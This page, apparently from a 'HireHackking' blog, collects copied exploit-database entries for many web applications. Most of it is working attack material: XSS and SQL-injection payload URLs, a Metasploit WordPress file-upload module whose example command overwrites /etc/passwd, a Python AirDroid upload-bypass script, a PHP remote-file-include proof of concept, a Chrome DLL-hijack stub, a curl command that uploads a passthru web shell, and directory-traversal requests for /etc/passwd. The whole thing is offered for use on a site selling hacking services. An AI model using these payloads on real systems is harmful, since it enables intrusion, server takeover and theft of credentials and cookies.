Jump to content

Hacker Technology

A group blog by Leader in Hacker Website - Providing Professional Ethical Hacking Services

  • Entries

    16114

  • Comments

    7952

  • Views

    863151830

Contributors to this blog

  • HireHackking 16114

About this blog

Hacking techniques include penetration testing, network security, reverse cracking, malware analysis, vulnerability exploitation, encryption cracking, social engineering, etc., used to identify and fix security flaws in systems.

HireHackking 
Document Title:
===============
WK UDID v1.0.1 iOS - Command Inject Vulnerability


References (Source):
====================
http://www.vulnerability-lab.com/get_content.php?id=1539


Release Date:
=============
2015-07-01


Vulnerability Laboratory ID (VL-ID):
====================================
1539


Common Vulnerability Scoring System:
====================================
5.6


Product & Service Introduction:
===============================
This app offers the opportunity to read device-specific information from your iPhone, iPad or iPod touch. The desired information can be 
selected and sent via email to a recipient of your choice or it can be copied to the clipboard for later use. You can get information about 
the unique identifier (UDID), the model, the name and the operating system of your device.

(Copy of the Homepage https://itunes.apple.com/us/app/wk-udid/id392624227 )


Abstract Advisory Information:
==============================
The Vulnerability Laboratory Research team discovered a local command inject web vulnerability in the official WK UDID v1.0.1 iOS mobile web-application.


Vulnerability Disclosure Timeline:
==================================
2015-07-01:	Public Disclosure (Vulnerability Laboratory)


Discovery Status:
=================
Published


Affected Product(s):
====================
WK EDV GmbH
Product: WK UDID - iOS Mobile Web Application 1.0.1


Exploitation Technique:
=======================
Local


Severity Level:
===============
Medium


Technical Details & Description:
================================
A local command inject web vulnerability has been discovered in the official WK UDID v1.0.1 iOS mobile web-application.
The vulnerability allows to inject malicious script codes to the application-side of the vulnerable mobile app.

The vulnerability is located in the device name value of the send by mail function. Local attackers are able to manipulate the name value 
of the device to compromise the mail function of the wkudid mobile app. The html encoding is broken in the send by mail export function. 
Local attackers are able to manipulate the device name id to compromise the application internal validation in send emails. The attack vector 
of the vulnerability is server-side and the injection point is the device name information settings.

The security risk of the local commandpath inject vulnerability is estimated as medium with a cvss (common vulnerability scoring system) count of 5.6. 
Exploitation of the commandpath inject vulnerability requires a low privilege androidios device account with restricted access and no user interaction. 
Successful exploitation of the vulnerability results in unauthorized execution of system specific commands and unauthorized path value requests to 
compromise the mobile iOS application and connected device components.

Vulnerable Module(s)
				[+] Device - Settings - Information
 
Vulnerable Parameter(s)
				[+] device name

Affected Module(s)
				[+] WKUDID - Mail


Proof of Concept (PoC):
=======================
The local command inject web vulnerability can be exploited by local attackers with low privilege device user account and without user interaction.
For security demonstration or to reproduce the security vulnerability follow the provided information and steps below to continue.

Manual steps to reproduce the vulnerability ...
1. Start the iOS device
2. Open the settings module
3. Change the name to the local command injection payload
4. Save the settings and start the application wkudid
5. Send the details by mail
6. Review the arrival inbox 
7. The execution point is the xml and header location with the device name value
8. Successful reproduce of the local command inject security vulnerability!


PoC Device ID - Email

<div>Identifier (UDID): FFFFFFFFC0463E7B3E5D46A88EDF4194C74B27D1
<br>Model: iPad<br>Name: bkm337>"<./[LOCAL COMMAND INJECT VULNERABILITY VIA DEVICE NAME VALUE!]">%20<gt;<BR>
System Name: iPhone OS<BR>System Version: 8.3<BR>Total Memory (RAM): 987.98 MB<BR>
Free Memory: 19.06 MB<BR>Total Storage: 27.19 GB<BR>Free Storage: 0.70 GB<BR>
CPU Frequency: an error occured<BR>Network: WiFi<BR>Wi-Fi: 02:00:00:00:00:00<BR>
IP Address: 192.168.2.104<BR>Carrier: not available<BR></iframe></div>


Solution - Fix & Patch:
=======================
The vulnerability can be patched by a secure parse and encode of the vulnerable Device name value. Restrict the input and encode the output in the 
vulnerable generated html file. Disallow script code values in the html generated file type to prevent further command injection attacks.


Security Risk:
==============
The security rsik of the local command inject web vulnerability in the device name value is estimated as medium. (CVSS 5.6)


Credits & Authors:
==================
Vulnerability Laboratory [Research Team] - Benjamin Kunz Mejri (bkm@evolution-sec.com) [www.vulnerability-lab.com]


Disclaimer & Information:
=========================
The information provided in this advisory is provided as it is without any warranty. Vulnerability Lab disclaims all warranties, either expressed 
or implied, including the warranties of merchantability and capability for a particular purpose. Vulnerability-Lab or its suppliers are not liable 
in any case of damage, including direct, indirect, incidental, consequential loss of business profits or special damages, even if Vulnerability-Lab 
or its suppliers have been advised of the possibility of such damages. Some states do not allow the exclusion or limitation of liability for 
consequential or incidental damages so the foregoing limitation may not apply. We do not approve or encourage anybody to break any vendor licenses, 
policies, deface websites, hack into databases or trade with fraud/stolen material.

Domains:    www.vulnerability-lab.com   	- www.vuln-lab.com			       		- www.evolution-sec.com
Contact:    admin@vulnerability-lab.com 	- research@vulnerability-lab.com 	       		- admin@evolution-sec.com
Section:    magazine.vulnerability-db.com	- vulnerability-lab.com/contact.php		       	- evolution-sec.com/contact
Social:	    twitter.com/#!/vuln_lab 		- facebook.com/VulnerabilityLab 	       		- youtube.com/user/vulnerability0lab
Feeds:	    vulnerability-lab.com/rss/rss.php	- vulnerability-lab.com/rss/rss_upcoming.php   		- vulnerability-lab.com/rss/rss_news.php
Programs:   vulnerability-lab.com/submit.php  	- vulnerability-lab.com/list-of-bug-bounty-programs.php	- vulnerability-lab.com/register/

Any modified copy or reproduction, including partially usages, of this file requires authorization from Vulnerability Laboratory. Permission to 
electronically redistribute this alert in its unmodified form is granted. All other rights, including the use of other media, are reserved by 
Vulnerability-Lab Research Team or its suppliers. All pictures, texts, advisories, source code, videos and other information on this website 
is trademark of vulnerability-lab team & the specific authors or managers. To record, list (feed), modify, use or edit our material contact 
(admin@vulnerability-lab.com or research@vulnerability-lab.com) to get a permission.

				Copyright © 2015 | Vulnerability Laboratory - [Evolution Security GmbH]

-- 
VULNERABILITY LABORATORY - RESEARCH TEAM
SERVICE: www.vulnerability-lab.com
CONTACT: research@vulnerability-lab.com
PGP KEY: http://www.vulnerability-lab.com/keys/admin@vulnerability-lab.com%280x198E9928%29.txt
HireHackking 
source: https://www.securityfocus.com/bid/54391/info

Kajona is prone to multiple cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input.

An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks.

Kajona 3.4.1 is vulnerable; other versions may also be affected. 

http://www.example.com/index.php?page=contact&absender_name=%22%3E%3Cscript%3Ealert%28document.cookie%29; %3C/script%3E
http://www.example.com/index.php?page=contact&absender_email=%22%3E%3Cscript%3Ealert%28doc ument.cookie%29;%3C/script%3E
http://www.example.com/index.php?page=contact&absender_nachricht=%3C/texta rea%3E%3Cscript%3Ealert%28document.cookie%29;%3C/script%3E
http://www.example.com/index.php?page=postacomment&comment_name=%22%3E%3Cscript%3Ealert%28document.cookie %29;%3C/script%3E
http://www.example.com/index.php?page=postacomment&comment_subject=%22%3E%3Cscript%3Ea lert%28document.cookie%29;%3C/script%3E
http://www.example.com/index.php?page=postacomment&comment_messa ge=%3C/textarea%3E%3Cscript%3Ealert%28document.cookie%29;%3C/script%3E
http://www.example.com/index.php?module=%3Cscript%3Ealert%28document.cookie%29;%3C/script%3E
http://www.example.com/index.php?module=login&admin=1&action=%3Cscript%3Ealert%28document.cookie%29;% 3C/script%3E
http://www.example.com/index.php?admin=1&module=user&action=list&pv=%22%3E%3Cscript%3Ealert%28doc ument.cookie%29;%3C/script%3E
http://www.example.com/index.php?admin=1&module=user&action=list&p e=%22%3E%3Cscript%3Ealert%28document.cookie%29;%3C/script%3E
http://www.example.com/index.php?admin=1&module=user&action=newUser&user_username=%22%3E%3Cscript %3Ealert%28document.cookie%29;%3C/script%3E
http://www.example.com/index.php?admin=1&module=user&act ion=newUser&user_email=%22%3E%3Cscript%3Ealert%28document.cookie%29;%3C/script%3E
http://www.example.com /index.php?admin=1&module=user&action=newUser&user_forename=%22%3E%3Cscript%3Ealert%28do cument.cookie%29;%3C/script%3E
http://www.example.com/index.php?admin=1&module=user&action=newUser&a mp;user_name=%22%3E%3Cscript%3Ealert%28document.cookie%29;%3C/script%3E
http://www.example.com/index.php?adm in=1&module=user&action=newUser&user_street=%22%3E%3Cscript%3Ealert%28document.cookie%29 ;%3C/script%3E
http://www.example.com/index.php?admin=1&module=user&action=newUser&user_postal=% 22%3E%3Cscript%3Ealert%28document.cookie%29;%3C/script%3E
http://www.example.com/index.php?admin=1&modul e=user&action=newUser&user_city=%22%3E%3Cscript%3Ealert%28document.cookie%29;%3C/script%3E
http://www.example.com/index.php?admin=1&module=user&action=newUser&user_tel=%22%3E%3Cscript%3Eal ert%28document.cookie%29;%3C/script%3E
http://www.example.com/index.php?admin=1&module=user&action=n ewUser&user_mobile=%22%3E%3Cscript%3Ealert%28document.cookie%29;%3C/script%3E
http://www.example.com/index.php?admin=1&module=user&action=groupNew&group_name=%22%3E%3Cscript%3 Ealert%28document.cookie%29;%3C/script%3E
http://www.example.com/index.php?admin=1&module=user&actio n=groupNew&group_desc=%3C/textarea%3E%3Cscript%3Ealert%28document.cookie%29;%3C/script%3E
http://www.example.com/index.php?admin=1&module=pages&action=newPage&name=%22%3E%3Cscript%3Ealert %28document.cookie%29;%3C/script%3E
http://www.example.com/index.php?admin=1&module=pages&action=new Page&browsername=%22%3E%3Cscript%3Ealert%28document.cookie%29;%3C/script%3E
http://www.example.com/index .php?admin=1&module=pages&action=newPage&seostring=%22%3E%3Cscript%3Ealert%28document.co okie%29;%3C/script%3E
http://www.example.com/index.php?admin=1&module=pages&action=newPage&keywo rds=%3C/textarea%3E%3Cscript%3Ealert%28document.cookie%29;%3C/script%3E
http://www.example.com/index.php?adm in=1&module=pages&action=newPage&folder_id=%22%3E%3Cscript%3Ealert%28document.cookie%29; %3C/script%3E
http://www.example.com/index.php?admin=1&module=pages&action=newElement&element_name=%22%3E%3Cscr ipt%3Ealert%28document.cookie%29;%3C/script%3E
http://www.example.com/index.php?admin=1&module=pages& ;action=newElement&element_cachetime=%22%3E%3Cscript%3Ealert%28document.cookie%29;%3C/script%3E
http://www.example.com/index.php?admin=1&module=system&action=newAspect&aspect_name=%22%3E%3Cscri pt%3Ealert%28document.cookie%29;%3C/script%3E
http://www.example.com/index.php?admin=1&module=filemanager&action=newRepo&filemanager_name=%22%3 E%3Cscript%3Ealert%28document.cookie%29;%3C/script%3E
http://www.example.com/index.php?admin=1&module=fi lemanager&action=newRepo&filemanager_path=%22%3E%3Cscript%3Ealert%28document.cookie%29;%3C/s cript%3E
http://www.example.com/index.php?admin=1&module=filemanager&action=newRepo&filemanager_ upload_filter=%22%3E%3Cscript%3Ealert%28document.cookie%29;%3C/script%3E
http://www.example.com/index.php?ad min=1&module=filemanager&action=newRepo&filemanager_view_filter=%22%3E%3Cscript%3Ealert% 28document.cookie%29;%3C/script%3E
http://www.example.com/index.php?admin=1&module=downloads&action=newArchive&archive_title=%22%3E% 3Cscript%3Ealert%28document.cookie%29;%3C/script%3E
http://www.example.com/index.php?admin=1&module=down loads&action=newArchive&archive_path=%22%3E%3Cscript%3Ealert%28document.cookie%29;%3C/script %3E
HireHackking 
source: https://www.securityfocus.com/bid/54401/info

Phonalisa is prone to multiple HTML-injection, cross-site-scripting, and arbitrary code-execution vulnerabilities because the application fails to sufficiently sanitize user-supplied data.

Attackers can exploit these issues to execute arbitrary code in the context of the web server, compromise the affected application, or steal cookie-based authentication credentials from legitimate users of the site. Other attacks are also possible.

Phonalisa 5.0 is vulnerable; other versions may also be affected. 

http://www.example.com/?s=monitorqueues&sudo=su%22%3E%3Ciframe%20src=a%20onload=alert%28document.cookie%29%20%3C [XSS]

http://www.example.com/?s=monitorqueues&sudo=su%22%3E%3Ciframe%20src=a%20onload=alert%28%22VL%22%29%20%3C [XSS]

http://www.example.com/?s=home&m=home&sudo=%22%3E%3Cimg%20src=http://www.vuln-lab.com/images/200911/11/i8du12ievi9fh1a9rm-owned-headonfire.jpg%20onload=alert%28123%29;%20/%3E&setlang=en-us [XSS]

http://www.example.com/?s=home&m=home&sudo=%22%3E%3Cimg%20src=http://www.vuln-lab.com/images/200911/11/i8du12ievi9fh1a9rm-owned-headonfire.jpg%20/%3E&setlang=en-us [XSS]

http://www.example.com/?s=provphones&m=phones&sudo=su&mac=%22%3E%3Ciframe%20src=a%20onload=alert%28%22VL
%22%29%20%3C&ip=127.0.0.1&pbx_id=%22%3E%3Ciframe%20src=a%20onload=alert%28%22VL%22%29%20%3C&phone_type=%22%3E%3Ciframe%20src=a%20onload=alert%28%22VL%22%29%20%3C [XSS]

http://www.example.com/&mac=%22%3E%3Ciframe%20src=a%20onload=alert%28%22VL%22%29%20%3C&sudo=su§ion=%2Fprov%2Fcisco [XSS]
HireHackking 
source: https://www.securityfocus.com/bid/54440/info

The Generic Plugin for WordPress is prone to an arbitrary-file-upload vulnerability.

An attacker can exploit this issue to upload arbitrary PHP code and run it in the context of the Web server process. This may facilitate unauthorized access or privilege escalation; other attacks are also possible.

Generic Plugin 0.1 is vulnerable; other versions are also affected. 

require 'msf/core'

class Metasploit3 < Msf::Exploit::Remote
  Rank = ExcellentRanking

  include Msf::Exploit::Remote::HttpClient

  def initialize(info = {})
  super(update_info(info,
  'Name' => 'WordPress Generic plugins Arbitrary File Upload',
  'Description' => %q{
   This module exploits an arbitrary PHP File Upload and Code Execution flaw in some
  WordPress blog software plugins. The vulnerability allows for arbitrary file upload 
  and remote code execution POST Data to Vulnerable Script/File in the plugin.
   },
   'Author' => [ 'KedAns-Dz <ked-h[at]1337day.com>' ], # MSF Module
   'License' => MSF_LICENSE,
   'Version' => '0.1', # Beta Version Just for Pene-Test/Help - Wait the Best !
   'References' => [ 
     'URL', 'http://1337day.com/related/18686',
     'URL', 'http://packetstormsecurity.org/search/?q=wordpress+shell+upload' 
  ],
   'Privileged' => false,
   'Payload' =>
    {
    'Compat'  => { 'ConnectionType' => 'find', },
    },
    'Platform'       => 'php',
    'Arch'           => ARCH_PHP,
    'Targets'        => [[ 'Automatic', { }]],
    'DisclosureDate' => 'Jun 16 2012',
    'DefaultTarget' => 0))

   register_options(
    [
     OptString.new('TARGETURI', [true, "The URI path to WordPress", "/"]),
     OptString.new('PLUGIN', [true, "The Full URI path to Plugin and Vulnerable File", "/"]),
     OptString.new('UDP', [true, "Full Path After Upload", "/"])
    # Example :
    # set TARGETURI http://127.0.0.1/wp
    # set PLUGIN wp-content/plugins/foxypress/uploadify/uploadify.php
    # set UDP wp-content/affiliate_images/
    # set RHOST 127.0.0.1
    # set PAYLOAD php/exec
    # set CMD echo "toor::0:0:::/bin/bash">/etc/passwd
    # exploit
    ], self.class)
  end

   def check
    uri = datastore['TARGETURI']
    plug = datastore['PLUGIN']
  
    res = send_request_cgi({
    'method' => 'GET',
    'uri' => "#{uri}'/'#{plug}"
    })
    
 if res and res.code == 200
   return Exploit::CheckCode::Detected
  else
   return Exploit::CheckCode::Safe
   end
 end

  def exploit

   uri = datastore['TARGETURI']
   plug = datastore['PLUGIN']
   path = datastore['UDP']
 
   peer = "#{rhost}:#{rport}"

   post_data = Rex::MIME::Message.new
   post_data.add_part("<?php #{payload.encoded} ?>",
   "application/octet-stream", nil, 
   "form-data; name=\"Filedata\"; filename=\"#{rand_text_alphanumeric(6)}.php\"")

   print_status("#{peer} - Sending PHP payload")

  res = send_request_cgi({
  'method' => 'POST',
  'uri'    => "#{uri}'/'#{plug}",
  'ctype'  => 'multipart/form-data; boundary=' + post_data.bound,
  'data'   => post_data.to_s
  })

   if not res or res.code != 200 or res.body !~ /\{\"raw_file_name\"\:\"(\w+)\"\,/
   print_error("#{peer} - File wasn't uploaded, aborting!")
   return
   end

   print_good("#{peer} - Our payload is at: #{$1}.php! Calling payload...")
   res = send_request_cgi({
   'method' => 'GET',
   'uri'    => "#{uri}'/'#{path}'/'#{$1}.php"
   })

   if res and res.code != 200
   print_error("#{peer} - Server returned #{res.code.to_s}")
   end

   end

end
HireHackking 
source: https://www.securityfocus.com/bid/54402/info

Funeral Script PHP is prone to multiple cross-site scripting vulnerabilities and multiple SQL-injection vulnerabilities because the application fails to sufficiently sanitize user-supplied input.

Exploiting these issues could allow an attacker to steal cookie-based authentication credentials, compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.

SQL-injection:

http://www.example.com/funeral_script.php?hide_cat=[SQL-INJECTION]
http://www.example.com/funeralscript/admin.php?act=obituaries&orderType=[ASC/DESC]&search=&orderBy=[SQL-INJECTION]
http://www.example.com/funeralscript/admin.php?act=comments&obit_id=&orderType=[ASC/DESC]&search=&orderBy=[SQL-INJECTION]
http://www.example.com/funeralscript/admin.php?act=comments&obit_id=&orderType=[SQL-INJECTION]
http://www.example.com/funeralscript/admin.php?act=obituaries&orderType=[SQL-INJECTION]


Cross-site scripting:

http://www.example.com/funeralscript/admin.php?act=obituaries&orderType=[ASC/DESC]&search=&orderBy=[Cross Site Scripting]
http://www.example.com/funeralscript/admin.php?act=obituaries&orderType=[ASC/DESC]&search=[Cross Site Scripting]
http://www.example.com/funeralscript/admin.php?act=obituaries&orderType=[Cross Site Scripting]
http://www.example.com/funeralscript/admin.php?act=comments&obit_id=&orderType=[ASC/DESC]&search=&orderBy=[Cross Site Scripting]
http://www.example.com/funeralscript/admin.php?act=comments&obit_id=[Cross Site Scripting]&orderType=[ASC/DESC]&search=[Cross Site Scripting]
http://www.example.com/funeralscript/admin.php?act=comments&obit_id=&orderType=[Cross Site Scripting]
http://www.example.com/funeralscript/admin.php?act=comments&obit_id=-1%[Cross Site Scripting]
http://www.example.com/funeral_script.php?id=1&p=[Cross Site Scripting]%3C&search=[Cross Site Scripting]
http://www.example.com/funeral_script.php?hide_cat=[Cross Site Scripting]
HireHackking 
#/IN THE NAME OF GOD
#/auth====PARSA ADIB

import sys,requests,re,urllib2
def logo():
 print"\t\t       .__           .___             .__    .___"
 print"\t\t_____  |__|______  __| _/______  ____ |__| __| _/"
 print"\t\t\__  \ |  \_  __ \/ __ |\_  __ \/  _ \|  |/ __ | "
 print"\t\t / __ \|  ||  | \/ /_/ | |  | \(  <_> )  / /_/ | "
 print"\t\t(____  /__||__|  \____ | |__|   \____/|__\____ | "
 print"\t\t     \/               \/                      \/ "
 print "\t\tAIRDROID VerAll UPLOAD AUTH BYPASS PoC @ Parsa Adib"
if len(sys.argv)<6 or len(sys.argv)>6 :
 logo()
 print "\t\tUSAGE:python exploit.py ip port remote-file-name local-file-name remote-file-path"
 print "\t\tEXAMPLE:python exploit.py 192.168.1.2 8888 poc poc.txt /sdcard"
else :
 logo()
 print "\n[+]Reciving Details\n-----------------------------"
 try : 
  p = requests.get('http://'+sys.argv[1]+':'+sys.argv[2]+'/sdctl/comm/ping/') 
 except IOError :
  print "\n[!] Check If server is Running"
  sys.exit()
 for i in p.content.split(',') :
  for char in '{"}_': 
   i = i.replace(char,'').upper()
  print "[*]"+i+""
 print "\n[+]Sending File\n-----------------------------"
 try :  
  r = requests.post('http://'+sys.argv[1]+':'+sys.argv[2]+'/sdctl/comm/upload/dir?fn='+sys.argv[3]+'&d='+sys.argv[5]+'&after=1&fname='+sys.argv[3], files={sys.argv[4]: open(sys.argv[4], 'rb').read()})
  if (r.status_code == 200) :
   print "[*]RESPONSE:200"
   print "[*]FILE SENT SUCCESSFULY"
 except IOError :
  print "\n[!] Error"
HireHackking 
source: https://www.securityfocus.com/bid/54455/info

Event Calender PHP is prone to multiple input validation vulnerabilities.

Exploiting these vulnerabilities could allow an attacker to execute arbitrary script code, steal cookie-based authentication credentials, compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.

Event Calender PHP 1.2 is vulnerable; other versions may also be affected. 

http://www.example.com/eventcalendar/admin.php?act=calendars&orderType=DESC&search=&orderBy=-1%27[SQL-INJECTION]cal_name&cal_id=2

http://www.example.com/eventcalendar/admin.php?act=calendars&orderType=-1%27[SQL-INJECTION]&search=&orderBy=cal_name&cal_id=2

http://www.example.com/eventcalendar/admin.php?act=events&orderType=ASC-1%27[SQL-INJECTION]&orderBy=event_title&cal_id=2

http://www.example.com/eventcalendar/admin.php?act=events&orderType=ASC&orderBy=-1%27[SQL-INJECTION]event_title&cal_id=2

http://www.example.com/preview.php?act=calendars&orderType=DESC&search=&orderBy=-1%27[SQL-INJECTION]cal_name&cal_id=2

http://www.example.com/eventcalendar/admin.php?act=newCal&cal_id=2

http://www.example.com/eventcalendar/admin.php?act=newEvent&cal_id=2

http://www.example.com/eventcalendar/preview.php?cal_id=%22%3E%3Ciframe%20src=a%20onload=alert%28%22VL%22%29%20%3C&cal_month=1&cal_year=0#oncal

http://www.example.com/eventcalendar/preview.php?cal_id=2&cal_month=%22%3E%3Ciframe%20src=a%20onload=alert%28%22VL%22%29%20%3C&cal_year=0#oncal

http://www.example.com/eventcalendar/preview.php?cal_id=2&cal_month=1&cal_year=%22%3E%3Ciframe%20src=a%20onload=alert%28%22VL%22%29%20%3C#oncal

http://www.example.com/eventcalendar/admin.php?act=%22%3E%3Ciframe%20src=a%20onload=alert%28%22VL%22%29%20%3C
HireHackking 
source: https://www.securityfocus.com/bid/54452/info

Elite Bulletin Board is prone to multiple SQL-injection vulnerabilities because the application fails to properly sanitize user-supplied input before using it in an SQL query.

A successful exploit could allow an attacker to compromise the application, access or modify data, or exploit vulnerabilities in the underlying database.

Elite Bulletin Board 2.1.19 is vulnerable; other versions may also be affected 

http://www.example.com/ebbv2/groups.php?id=%5c&mode=view
http://www.example.com/ebbv2/rssfeed.php?bid=%5c
http://www.example.com/ebbv2/viewboard.php?bid=%5c
HireHackking 
source: https://www.securityfocus.com/bid/54459/info

The Post Recommendations plug-in for WordPress is prone to a remote file-include vulnerability because it fails to sufficiently sanitize user-supplied input.

Exploiting this issue could allow an attacker to compromise the application and the underlying system; other attacks are also possible.

Post Recommendations 1.1.2 is vulnerable; other versions may also be affected. 

PostShell.php
<?php

$ch = curl_init("http://localhost/wordpress/wp-content/plugins/post-recommendations-for-wordpress/lib/api.php");
curl_setopt($ch, CURLOPT_POST, true);
curl_setopt($ch, CURLOPT_POSTFIELDS, array('abspath'=>"http://localhost/lo.txt\0"));
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
$postResult = curl_exec($ch);
curl_close($ch);

print "$postResult";

?>


lo.txt
<?php phpinfo(); ?>
HireHackking 
source: https://www.securityfocus.com/bid/54456/info

Simple Machines is prone to multiple HTML-injection vulnerabilities because it fails to properly sanitize user-supplied input before using it in dynamically generated content.

Successful exploits will allow attacker-supplied HTML and script code to run in the context of the affected application, potentially allowing the attacker to steal cookie-based authentication credentials or control how the site is rendered to the user. Other attacks are also possible.

Simple Machines Forum 2.0.2 is vulnerable; other versions may also be affected. 

Proof of Concept:
=================
The persistent input validation vulnerability can be exploited by remote attacker with local low privileged user account & low required 
user inter action. For demonstration or reproduce ...

Review: Package Manager > Download New Packages > FTP Information Required (Listing)

<dd>
<input size="30" name="ftp_server" id="ftp_server" type="text"><[PERSISTENT SCRIPT CODE]' <"="" class="input_text">
<label for="ftp_port">Port:&nbsp;</label> 
<input type="text" size="3" name="ftp_port" id="ftp_port" value="21" 
class="input_text" />

... or


<dd>
<input size="50" name="ftp_path" id="ftp_path" value="public_html/demo/smf " 
type="text"><[PERSISTENT SCRIPT CODE])' <"="" style="width: 99%;" class="input_text">
</dd>
</dl>
<div class="righttext">


URL: http://www.example.com/smf/index.php?action=admin;area=packages;sa=packageget;get;f5073d7837d8=5a2bdd540a245be265f26c102fff9626



Review: Smiley Sets > Add

<tr class="windowbg" id="list_smiley_set_list_0">
<td style="text-align: center;"></td>
<td class="windowbg">Akyhne's Set</td>
<td class="windowbg">"><[PERSISTENT SCRIPT CODE]' <="" <strong="">
akyhne</strong>/...</td>


URL: http://www.example.com/smf/index.php?action=admin;area=smileys;sa=modifyset;set=2


Review: Newsletter > Add

<input name="email_force" value="0" type="hidden">
<input name="total_emails" value="1" type="hidden">
<input name="max_id_member" value="13" type="hidden">
<input name="groups" value="0,1,2,3" type="hidden">
<input name="exclude_groups" value="0,1,2,3" type="hidden">
<input name="members" value="" type="hidden">
<input name="exclude_members" value="" type="hidden">
<input name="emails" value="" type="hidden"><[PERSISTENT SCRIPT CODE])' <"="">
    </form>
  </div>
  <br class="clear" />
</div>

URL: http://www.example.com/smf/index.php?action=admin;area=news;sa=mailingmembers;b74f235ec=2b30f2b9aad6e26815e1c18594922b37


Review: Edit Membergroups & User/Groups Listing

<h3 class="catbg">Edit Membergroup - "><[PERSISTENT SCRIPT CODE])' <"=""><[PERSISTENT SCRIPT CODE]) <"
><ifram
</h3>
</div>
<div class="windowbg2">
<span class="topslice"><span></span></span>

URL: http://www.example.com/smf/index.php?action=admin;area=membergroups;sa=index;b74f235ec=2b30f2b9aad6e26815e1c18594922b37
URL: http://www.example.com/smf/index.php?action=admin;area=membergroups;sa=add;b74f235ec=2b30f2b9aad6e26815e1c18594922b37
HireHackking 
source: https://www.securityfocus.com/bid/54467/info

Rama Zeiten CMS is prone to a remote file-disclosure vulnerability because it fails to properly sanitize user-supplied input.

An attacker can exploit this vulnerability to view local files in the context of the web server process, which may aid in further attacks.

Rama Zeiten CMS 0.99 is vulnerable; other versions may also be affected.

http://www.example.com/ramazeiten/download.php?file=../../../../../etc/passwd
HireHackking 
source: https://www.securityfocus.com/bid/54466/info

web@all is prone to a cross-site scripting vulnerability because it fails to sufficiently sanitize user-supplied data.

An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks.

web@all 2.0 is vulnerable; other versions may also be affected. 

http://www.example.com/webatall-2.0/my/kindeditor/?name=%3Cscript%3Ealert%28123%29%3C/script%3E
HireHackking 
source: https://www.securityfocus.com/bid/54470/info

EmbryoCore CMS is prone to multiple directory-traversal vulnerabilities because it fails to properly sanitize user-supplied input.

Remote attackers can use specially crafted requests with directory-traversal sequences ('../') to retrieve arbitrary files in the context of the application.

Exploiting these issues may allow an attacker to obtain sensitive information that could aid in further attacks.

EmbryoCore 1.03 is vulnerable; other versions may also be affected. 

http://www.example.com/embryocore1.03/libs/common/loadscript.php?j=./configuration.php%00

http://www.example.com/embryocore1.03/libs/common/loadscript.php?j=../../../../../../etc/passwd%00

http://www.example.com/embryocore1.03/libs/common/loadcss.php?c=../../../../../../etc/passwd%00

http://www.example.com/embryocore1.03/libs/common/loadcss.php?c=./configuration.php%00
HireHackking 
source: https://www.securityfocus.com/bid/54591/info

AVA VoIP is prone to multiple security vulnerabilities because the application fails to sanitize user-supplied input.

An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site, steal cookie-based authentication credentials, upload and execute arbitrary files in the context of the web server, and launch other attacks.

AVA VoIP 1.5.12 is vulnerable; other versions may also be affected. 

http://www.example.com/agent_accounts_report.php?agent_id=%22%3E%3Ciframe%20src=http://www.example1.com%20onload=alert%28%22VL%22%29%20%3C
http://www.example.com/tariff_add.php?tariff_id=%22%3E%3Ciframe%20src=http://www.example1.com%20onload=alert%28%22VL%22%29%20%3C
http://www.example.com/routeset_set.php?routeset_id=%22%3E%3Ciframe%20src=http://www.example1.com%20onload=alert%28%22VL%22%29%20%3C
HireHackking 
/*
source: https://www.securityfocus.com/bid/54477/info

Google Chrome is prone to a vulnerability that lets attackers execute arbitrary code.

An attacker can exploit this issue by enticing a legitimate user to use the vulnerable application to open a file from a network share location that contains a specially crafted Dynamic Linked Library (DLL) file.

Google Chrome 19.0.1084.21 through versions 20.0.1132.23 are vulnerable.

Note: This issue was previously discussed in BID 54203 (Google Chrome Prior to 20.0.1132.43 Multiple Security Vulnerabilities), but has been given its own record to better document it. 
*/

#include <windows.h>
int hijack_poc ()
{
 WinExec ( "calc.exe" , SW_NORMAL );
 return 0 ;
}

BOOL WINAPI DllMain
    (    HINSTANCE hinstDLL ,
       DWORD dwReason ,
       LPVOID lpvReserved )
{
 hijack_poc () ;
 return 0 ;
}
HireHackking 
+---------------------------------------------------------------------------+ 
#[+] Author: TUNISIAN CYBER 
#[+] Title: WP Plugin Free ACF Frontend Display File Upload Vulnerability 
#[+] Date: 3-07-2015 
#[+] Type: WebAPP 
#[+] Download Plugin: https://downloads.wordpress.org/plugin/acf-frontend-display.2.0.5.zip
#[+] Tested on: KaliLinux 
#[+] Friendly Sites: sec4ever.com 
#[+] Twitter: @TCYB3R 
+---------------------------------------------------------------------------+ 

curl -k -X POST -F "action=upload" -F "files=@/root/Desktop/evil.php" "site:wp-content/plugins/acf-frontend-display/js/blueimp-jQuery-File-Upload-d45deb1/server/php/index.php" 

File Path: site/wp-content/uploads/uigen_YEAR/file.php 
Example: site/wp-content/uploads/uigen_2015/evil.php 
evil.php: <?php passthru($_GET['cmd']); ?> 


TUNISIAN CYBER(miutex)-S4E
HireHackking 
source: https://www.securityfocus.com/bid/54593/info

Barracuda SSL VPN 680 is prone to multiple cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input.

An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may let the attacker steal cookie-based authentication credentials and launch other attacks.

Barracuda SSL VPN 680 versions prior to 2.2.2.203 are vulnerable. 

www.example.com/launchAgent.do?launchId=l3ce418&returnTo=[NON-PERSISTENT SCRIPT CODE!]
HireHackking 
source: https://www.securityfocus.com/bid/54593/info
 
Barracuda SSL VPN 680 is prone to multiple cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input.
 
An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may let the attacker steal cookie-based authentication credentials and launch other attacks.
 
Barracuda SSL VPN 680 versions prior to 2.2.2.203 are vulnerable. 

www.example.com/fileSystem.do?launchId=l52ca6d&actionTarget=list&path=smb/Sales%20Folder/Testing %20from%20Tri%20Opt/%22%3E%3Ciframe%20src=a%20onload=alert%28%22VL%22%29%20%3C
HireHackking 
source: https://www.securityfocus.com/bid/54599/info

Arora Browser is prone to a remote denial-of-service vulnerability.

Attackers can exploit these issues to crash an application, which causes a denial-of-service condition. 

